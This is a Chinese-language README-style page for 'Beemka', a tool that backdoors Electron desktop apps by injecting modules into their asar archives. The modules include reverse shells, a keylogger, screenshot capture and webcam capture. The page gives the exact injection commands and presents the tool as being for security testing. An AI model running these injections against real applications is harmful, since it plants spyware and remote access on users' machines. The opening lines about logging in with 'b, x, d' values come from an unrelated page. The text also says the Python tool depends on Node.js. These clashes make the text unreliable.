针对 Electron App 的漏洞利用工具

拿到b、x、d以及对应值去登录

刷新进入

可参考视频

可参考视频

• Python 3.5+
• JSMIN

安装

pip3 install -r requirements.txt


模块

python3 beemka.py --listAvailable modules[ rshell_cmd ]          Windows Reverse Shell[ rshell_linux ]        Linux Reverse Shell[ screenshot ]          Screenshot Module[ rshell_powershell ]   PowerShell Reverse Shell[ keylogger ]           Keylogger Module[ webcamera ]           WebCamera Module

特点

usage: Beemka Electron Exploitation [-h] [-v] [-l] [-i] [-f ASAR_FILE]                                    [-p ASAR_WORKING_PATH] [-o OUTPUT_FILE]                                    [-m MODULE] [-u] [-z]optional arguments:  -h, --help            show this help message and exit  -v, --version         show program's version number and exit  -l, --list-modules    List all available modules.  -i, --inject          Inject code into Electron.  -f ASAR_FILE, --asar ASAR_FILE                        Path to electron.asar file.  -p ASAR_WORKING_PATH, --asar-working-path ASAR_WORKING_PATH                        Temporary working path to use for extracting asar                        archives.  -o OUTPUT_FILE, --output OUTPUT_FILE                        Path to the file that will be generated.  -m MODULE, --module MODULE                        Module to inject. Use --list-modules to list available                        modules.  -u, --unpack          Unpack asar file.  -z, --pack            Pack asar file.

将模块注入应用程序：

python3 beemka.py --inject --module keylogger --asar "PATH_TO_ELECTRON.ASAR" --output "SAVE_AS_ASAR"

# 示例命令python3 beemka.py --asar /path/to/asar/file --module rshell_cmd

应用案例

安全测试：Beemka 可以用于测试 Electron 应用的安全性，通过注入恶意代码来检查应用的响应和防御机制。

渗透测试：渗透测试人员可以使用 Beemka 来模拟攻击，评估系统的安全性。

最佳实践

定期更新：确保使用最新版本的 Beemka 和 Electron 应用，以避免已知的安全漏洞。

权限控制：在测试环境中使用 Beemka 时，确保有适当的权限控制，避免对生产环境造成影响。

典型生态项目

Electron：Beemka 主要针对 Electron 应用进行操作，Electron 是一个使用 JavaScript、HTML 和 CSS 构建跨平台桌面应用的框架。

Node.js：Beemka 依赖于 Node.js 环境，Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时。